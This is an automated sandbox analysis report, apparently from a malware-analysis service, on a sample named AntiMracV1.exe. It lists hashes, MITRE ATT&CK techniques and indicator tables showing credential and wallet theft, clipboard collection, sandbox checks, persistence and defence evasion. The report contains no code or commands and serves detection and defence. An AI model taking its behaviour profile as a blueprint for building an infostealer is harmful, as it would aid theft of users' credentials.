e0f8fd9eb2e8f226afac9450bc4f471a19cf7c89be86163019e3d646200279d5

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-uk
resource tags

arch:x64arch:x86image:win11-20241007-uklocale:uk-uaos:windows11-21h2-x64systemwindows
submitted
20-11-2024 15:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AntiMracV1.exe
Size

29.1MB
MD5

f3e0c268199e4f788421716fde6f0760
SHA1

3d2ad93f3f989bb736062ffaa6fdd03c1368b19a
SHA256

e0f8fd9eb2e8f226afac9450bc4f471a19cf7c89be86163019e3d646200279d5
SHA512

66a6def1c946560f92c1a5a84173e4f9e1b9d33afb53fc3ccedbad56898cbb1e4c3b6ea138d0f91af71b7885fa1c4ca2b2ac162fb968d554fd8cf3bedff67fd0
SSDEEP

786432:WbjeRNCEDUQpt6ZkMpLdn3WpSrONCL79USlqZr6Y:CKRNCjCvMpLdRONpSk+Y

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1812 created 640	1812	powershell.EXE	5
PID 756 created 640	756	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4920	powershell.exe
2776	powershell.exe
1812	powershell.EXE
756	powershell.EXE
1360	powershell.exe
3340	powershell.exe
4440	powershell.exe
2020	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	windows32.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	upinstall.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4940	cmd.exe
2348	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
1364	updater_update.exe
5036	main.exe
1872	main.exe
2052	drv.exe
5004	Loader2.exe
4904	upinstall.exe
2644	upinstall.exe
3704	rar.exe
1532	updater.exe
4560	windows32.exe

Loads dropped DLL 64 IoCs

pid	Process
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
5004	Loader2.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe
2644	upinstall.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	pastebin.com
13	pastebin.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
2	ipinfo.io
1	ipinfo.io

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3888	powercfg.exe
2264	powercfg.exe
3152	powercfg.exe
4284	powercfg.exe
720	powercfg.exe
4792	powercfg.exe
4928	powercfg.exe
4816	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	windows32.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1512	tasklist.exe
3264	tasklist.exe
4584	tasklist.exe
4680	tasklist.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1532 set thread context of 3416	1532	updater.exe	217
PID 1812 set thread context of 2208	1812	powershell.EXE	234
PID 4560 set thread context of 3852	4560	windows32.exe	252
PID 4560 set thread context of 5096	4560	windows32.exe	255
PID 4560 set thread context of 1776	4560	windows32.exe	257
PID 756 set thread context of 4176	756	powershell.EXE	261

UPX packed file 43 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/2644-311-0x00007FFBD8420000-0x00007FFBD8A08000-memory.dmp	upx
behavioral3/memory/2644-312-0x00007FFBEE5E0000-0x00007FFBEE604000-memory.dmp	upx
behavioral3/memory/2644-313-0x00007FFBF0A90000-0x00007FFBF0A9F000-memory.dmp	upx
behavioral3/memory/2644-318-0x00007FFBEBA50000-0x00007FFBEBA7D000-memory.dmp	upx
behavioral3/memory/2644-319-0x00007FFBEB8D0000-0x00007FFBEB8E9000-memory.dmp	upx
behavioral3/memory/2644-320-0x00007FFBEB8A0000-0x00007FFBEB8C3000-memory.dmp	upx
behavioral3/memory/2644-321-0x00007FFBD98A0000-0x00007FFBD9A13000-memory.dmp	upx
behavioral3/memory/2644-322-0x00007FFBEB830000-0x00007FFBEB849000-memory.dmp	upx
behavioral3/memory/2644-323-0x00007FFBEE900000-0x00007FFBEE90D000-memory.dmp	upx
behavioral3/memory/2644-324-0x00007FFBEB800000-0x00007FFBEB82E000-memory.dmp	upx
behavioral3/memory/2644-326-0x00007FFBE4050000-0x00007FFBE4108000-memory.dmp	upx
behavioral3/memory/2644-329-0x00007FFBEE5E0000-0x00007FFBEE604000-memory.dmp	upx
behavioral3/memory/2644-328-0x00007FFBD80A0000-0x00007FFBD8415000-memory.dmp	upx
behavioral3/memory/2644-325-0x00007FFBD8420000-0x00007FFBD8A08000-memory.dmp	upx
behavioral3/memory/2644-330-0x00007FFBEB7E0000-0x00007FFBEB7F4000-memory.dmp	upx
behavioral3/memory/2644-332-0x00007FFBEE5D0000-0x00007FFBEE5DD000-memory.dmp	upx
behavioral3/memory/2644-331-0x00007FFBEBA50000-0x00007FFBEBA7D000-memory.dmp	upx
behavioral3/memory/2644-333-0x00007FFBEB8D0000-0x00007FFBEB8E9000-memory.dmp	upx
behavioral3/memory/2644-334-0x00007FFBD7F80000-0x00007FFBD809C000-memory.dmp	upx
behavioral3/memory/2644-394-0x00007FFBEB8A0000-0x00007FFBEB8C3000-memory.dmp	upx
behavioral3/memory/2644-426-0x00007FFBD98A0000-0x00007FFBD9A13000-memory.dmp	upx
behavioral3/memory/2644-485-0x00007FFBEB830000-0x00007FFBEB849000-memory.dmp	upx
behavioral3/memory/2644-489-0x00007FFBEB800000-0x00007FFBEB82E000-memory.dmp	upx
behavioral3/memory/2644-499-0x00007FFBE4050000-0x00007FFBE4108000-memory.dmp	upx
behavioral3/memory/2644-511-0x00007FFBD80A0000-0x00007FFBD8415000-memory.dmp	upx
behavioral3/memory/2644-512-0x00007FFBD8420000-0x00007FFBD8A08000-memory.dmp	upx
behavioral3/memory/2644-518-0x00007FFBD98A0000-0x00007FFBD9A13000-memory.dmp	upx
behavioral3/memory/2644-513-0x00007FFBEE5E0000-0x00007FFBEE604000-memory.dmp	upx
behavioral3/memory/2644-542-0x00007FFBEE5D0000-0x00007FFBEE5DD000-memory.dmp	upx
behavioral3/memory/2644-541-0x00007FFBEB7E0000-0x00007FFBEB7F4000-memory.dmp	upx
behavioral3/memory/2644-529-0x00007FFBD8420000-0x00007FFBD8A08000-memory.dmp	upx
behavioral3/memory/2644-554-0x00007FFBE4050000-0x00007FFBE4108000-memory.dmp	upx
behavioral3/memory/2644-553-0x00007FFBEB800000-0x00007FFBEB82E000-memory.dmp	upx
behavioral3/memory/2644-551-0x00007FFBEB830000-0x00007FFBEB849000-memory.dmp	upx
behavioral3/memory/2644-550-0x00007FFBD98A0000-0x00007FFBD9A13000-memory.dmp	upx
behavioral3/memory/2644-549-0x00007FFBEB8A0000-0x00007FFBEB8C3000-memory.dmp	upx
behavioral3/memory/2644-548-0x00007FFBEB8D0000-0x00007FFBEB8E9000-memory.dmp	upx
behavioral3/memory/2644-547-0x00007FFBEBA50000-0x00007FFBEBA7D000-memory.dmp	upx
behavioral3/memory/2644-546-0x00007FFBF0A90000-0x00007FFBF0A9F000-memory.dmp	upx
behavioral3/memory/2644-544-0x00007FFBD80A0000-0x00007FFBD8415000-memory.dmp	upx
behavioral3/memory/2644-543-0x00007FFBD7F80000-0x00007FFBD809C000-memory.dmp	upx
behavioral3/memory/2644-552-0x00007FFBEE900000-0x00007FFBEE90D000-memory.dmp	upx
behavioral3/memory/2644-545-0x00007FFBEE5E0000-0x00007FFBEE604000-memory.dmp	upx

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4504	sc.exe
4552	sc.exe
3584	sc.exe
544	sc.exe
4844	sc.exe
2496	sc.exe
4224	sc.exe
772	sc.exe
2476	sc.exe
1684	sc.exe
2648	sc.exe
2780	sc.exe
4148	sc.exe
4380	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral3/files/0x001900000002ab2d-139.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater_update.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1648	cmd.exe
5096	netsh.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5084	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4820	systeminfo.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732115846"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 20 Nov 2024 15:17:27 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	main.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
4384	AntiMracV1.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe
1872	main.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4384	AntiMracV1.exe
Token: SeIncreaseQuotaPrivilege	444	WMIC.exe
Token: SeSecurityPrivilege	444	WMIC.exe
Token: SeTakeOwnershipPrivilege	444	WMIC.exe
Token: SeLoadDriverPrivilege	444	WMIC.exe
Token: SeSystemProfilePrivilege	444	WMIC.exe
Token: SeSystemtimePrivilege	444	WMIC.exe
Token: SeProfSingleProcessPrivilege	444	WMIC.exe
Token: SeIncBasePriorityPrivilege	444	WMIC.exe
Token: SeCreatePagefilePrivilege	444	WMIC.exe
Token: SeBackupPrivilege	444	WMIC.exe
Token: SeRestorePrivilege	444	WMIC.exe
Token: SeShutdownPrivilege	444	WMIC.exe
Token: SeDebugPrivilege	444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	444	WMIC.exe
Token: SeRemoteShutdownPrivilege	444	WMIC.exe
Token: SeUndockPrivilege	444	WMIC.exe
Token: SeManageVolumePrivilege	444	WMIC.exe
Token: 33	444	WMIC.exe
Token: 34	444	WMIC.exe
Token: 35	444	WMIC.exe
Token: 36	444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	444	WMIC.exe
Token: SeSecurityPrivilege	444	WMIC.exe
Token: SeTakeOwnershipPrivilege	444	WMIC.exe
Token: SeLoadDriverPrivilege	444	WMIC.exe
Token: SeSystemProfilePrivilege	444	WMIC.exe
Token: SeSystemtimePrivilege	444	WMIC.exe
Token: SeProfSingleProcessPrivilege	444	WMIC.exe
Token: SeIncBasePriorityPrivilege	444	WMIC.exe
Token: SeCreatePagefilePrivilege	444	WMIC.exe
Token: SeBackupPrivilege	444	WMIC.exe
Token: SeRestorePrivilege	444	WMIC.exe
Token: SeShutdownPrivilege	444	WMIC.exe
Token: SeDebugPrivilege	444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	444	WMIC.exe
Token: SeRemoteShutdownPrivilege	444	WMIC.exe
Token: SeUndockPrivilege	444	WMIC.exe
Token: SeManageVolumePrivilege	444	WMIC.exe
Token: 33	444	WMIC.exe
Token: 34	444	WMIC.exe
Token: 35	444	WMIC.exe
Token: 36	444	WMIC.exe
Token: SeDebugPrivilege	1872	main.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	4680	tasklist.exe
Token: SeDebugPrivilege	1512	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe
Token: SeIncBasePriorityPrivilege	3552	WMIC.exe
Token: SeCreatePagefilePrivilege	3552	WMIC.exe
Token: SeBackupPrivilege	3552	WMIC.exe
Token: SeRestorePrivilege	3552	WMIC.exe
Token: SeShutdownPrivilege	3552	WMIC.exe
Token: SeDebugPrivilege	3552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3552	WMIC.exe
Token: SeRemoteShutdownPrivilege	3552	WMIC.exe
Token: SeUndockPrivilege	3552	WMIC.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2052	drv.exe
5004	Loader2.exe
924	OpenWith.exe
4904	upinstall.exe
2644	upinstall.exe
3704	rar.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3304	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4824 wrote to memory of 4384	4824	AntiMracV1.exe	77
PID 4824 wrote to memory of 4384	4824	AntiMracV1.exe	77
PID 4384 wrote to memory of 3396	4384	AntiMracV1.exe	78
PID 4384 wrote to memory of 3396	4384	AntiMracV1.exe	78
PID 3396 wrote to memory of 444	3396	cmd.exe	80
PID 3396 wrote to memory of 444	3396	cmd.exe	80
PID 4384 wrote to memory of 3332	4384	AntiMracV1.exe	82
PID 4384 wrote to memory of 3332	4384	AntiMracV1.exe	82
PID 4384 wrote to memory of 396	4384	AntiMracV1.exe	245
PID 4384 wrote to memory of 396	4384	AntiMracV1.exe	245
PID 4384 wrote to memory of 1364	4384	AntiMracV1.exe	86
PID 4384 wrote to memory of 1364	4384	AntiMracV1.exe	86
PID 4384 wrote to memory of 1364	4384	AntiMracV1.exe	86
PID 1364 wrote to memory of 5036	1364	updater_update.exe	87
PID 1364 wrote to memory of 5036	1364	updater_update.exe	87
PID 1364 wrote to memory of 2052	1364	updater_update.exe	91
PID 1364 wrote to memory of 2052	1364	updater_update.exe	91
PID 5036 wrote to memory of 1872	5036	main.exe	92
PID 5036 wrote to memory of 1872	5036	main.exe	92
PID 2052 wrote to memory of 5004	2052	drv.exe	93
PID 2052 wrote to memory of 5004	2052	drv.exe	93
PID 5004 wrote to memory of 2792	5004	Loader2.exe	216
PID 5004 wrote to memory of 2792	5004	Loader2.exe	216
PID 2792 wrote to memory of 4904	2792	cmd.exe	97
PID 2792 wrote to memory of 4904	2792	cmd.exe	97
PID 4904 wrote to memory of 2644	4904	upinstall.exe	98
PID 4904 wrote to memory of 2644	4904	upinstall.exe	98
PID 2644 wrote to memory of 3452	2644	upinstall.exe	99
PID 2644 wrote to memory of 3452	2644	upinstall.exe	99
PID 2644 wrote to memory of 776	2644	upinstall.exe	181
PID 2644 wrote to memory of 776	2644	upinstall.exe	181
PID 3452 wrote to memory of 3340	3452	cmd.exe	103
PID 3452 wrote to memory of 3340	3452	cmd.exe	103
PID 776 wrote to memory of 1360	776	cmd.exe	104
PID 776 wrote to memory of 1360	776	cmd.exe	104
PID 2644 wrote to memory of 2352	2644	upinstall.exe	187
PID 2644 wrote to memory of 2352	2644	upinstall.exe	187
PID 2644 wrote to memory of 1912	2644	upinstall.exe	106
PID 2644 wrote to memory of 1912	2644	upinstall.exe	106
